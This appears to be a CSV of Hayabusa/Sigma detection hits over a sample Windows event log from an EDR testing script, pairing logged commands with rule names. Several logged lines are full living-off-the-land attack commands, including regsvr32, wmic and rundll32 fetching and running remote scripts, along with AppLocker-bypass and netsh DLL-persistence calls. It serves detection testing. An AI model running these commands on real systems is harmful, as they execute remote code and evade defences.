2019-07-30 06:33:30.074 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout  5  :  Path: C:\Windows\System32\timeout.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:34.295 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe /U AllTheThings.dll  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:34.295 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:34.411 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe /U AllTheThings.dll  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:34.411 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:34.483 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout  5  :  Path: C:\Windows\System32\timeout.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:39.312 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:39.312 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:39.358 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThings.dll  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:39.358 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:39.372 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout  5  :  Path: C:\Windows\System32\timeout.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:39.907 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe  /U AllTheThings.dll  :  Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:39.907 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:44.268 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:44.287 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout  5  :  Path: C:\Windows\System32\timeout.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:44.641 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: regsvr32.exe  /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll  :  Path: C:\Windows\System32\regsvr32.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:44.641 +09:00,MSEDGEWIN10,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:44.641 +09:00,MSEDGEWIN10,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:45.581 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe""   :  Path: C:\Windows\System32\calc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: regsvr32.exe  /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:46.095 +09:00,MSEDGEWIN10,3,high,Regsvr32 Network Activity,,rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:49.748 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:49.748 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:49.889 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout  5  :  Path: C:\Windows\System32\timeout.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:50.104 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe  xxxFile.csproj  :  Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:50.104 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:53.776 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:53.843 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout  5  :  Path: C:\Windows\System32\timeout.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:54.246 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: wmic  process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl""  :  Path: C:\Windows\System32\wbem\WMIC.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:54.246 +09:00,MSEDGEWIN10,1,medium,XSL Script Processing,,rules/sigma/process_creation/win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:54.246 +09:00,MSEDGEWIN10,1,medium,SquiblyTwo,,rules/sigma/process_creation/win_bypass_squiblytwo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:54.630 +09:00,MSEDGEWIN10,11,high,Windows Shell File Write to Suspicious Folder,,rules/sigma/file_event/file_event_win_shell_write_susp_directory.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:54.718 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe""   :  Path: C:\Windows\System32\calc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: wmic  process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:58.256 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl      :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:58.256 +09:00,MSEDGEWIN10,1,medium,Capture a Network Trace with netsh.exe,,rules/sigma/process_creation/win_netsh_packet_capture.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:58.286 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c netsh trace show status      :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:58.485 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c netsh.exe add helper AllTheThings.dll  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:58.543 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:58.598 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:58.683 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c netsh trace stop  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:00.330 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh  trace show status      :  Path: C:\Windows\System32\netsh.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c netsh trace show status    ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:00.420 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh  trace start capture=yes filemode=append persistent=yes tracefile=trace.etl      :  Path: C:\Windows\System32\netsh.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl    ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:00.420 +09:00,MSEDGEWIN10,1,medium,Capture a Network Trace with netsh.exe,,rules/sigma/process_creation/win_netsh_packet_capture.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:00.434 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh  trace stop  :  Path: C:\Windows\System32\netsh.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c netsh trace stop,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:00.442 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh  interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0  :  Path: C:\Windows\System32\netsh.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:00.442 +09:00,MSEDGEWIN10,1,medium,Netsh Port Forwarding,,rules/sigma/process_creation/win_netsh_port_fwd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:00.460 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh  interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1  :  Path: C:\Windows\System32\netsh.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:00.460 +09:00,MSEDGEWIN10,1,medium,Netsh Port Forwarding,,rules/sigma/process_creation/win_netsh_port_fwd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:00.466 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh.exe  add helper AllTheThings.dll  :  Path: C:\Windows\System32\netsh.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c netsh.exe add helper AllTheThings.dll,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:00.466 +09:00,MSEDGEWIN10,1,high,Suspicious Netsh DLL Persistence,,rules/sigma/process_creation/win_susp_netsh_dll_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:00.731 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:00.970 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout  5  :  Path: C:\Windows\System32\timeout.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:01.090 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\dispdiag.exe -out dispdiag_start.dat  :  Path: C:\Windows\System32\dispdiag.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: netsh  trace start capture=yes filemode=append persistent=yes tracefile=trace.etl    ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:05.237 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c rundll32 AllTheThings.dll,EntryPoint  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:05.252 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout  5  :  Path: C:\Windows\System32\timeout.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:05.502 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32  AllTheThings.dll,EntryPoint  :  Path: C:\Windows\System32\rundll32.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c rundll32 AllTheThings.dll,EntryPoint",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:05.542 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32  AllTheThings.dll,EntryPoint  :  Path: C:\Windows\SysWOW64\rundll32.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: rundll32  AllTheThings.dll,EntryPoint",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:10.373 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"")  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:10.373 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:10.388 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout  5  :  Path: C:\Windows\System32\timeout.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:10.708 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32.exe  javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"")  :  Path: C:\Windows\System32\rundll32.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"")",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:10.708 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:11.501 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe""   :  Path: C:\Windows\System32\calc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: rundll32.exe  javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"")",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:12.352 +09:00,MSEDGEWIN10,3,medium,Rundll32 Internet Connection,,rules/sigma/network_connection/sysmon_rundll32_net_connections.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:15.226 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new0ActiveXObject(""WScript.Shell"").run(""calc.exe"",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im rundll32.exe && exit"",0,true);}  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
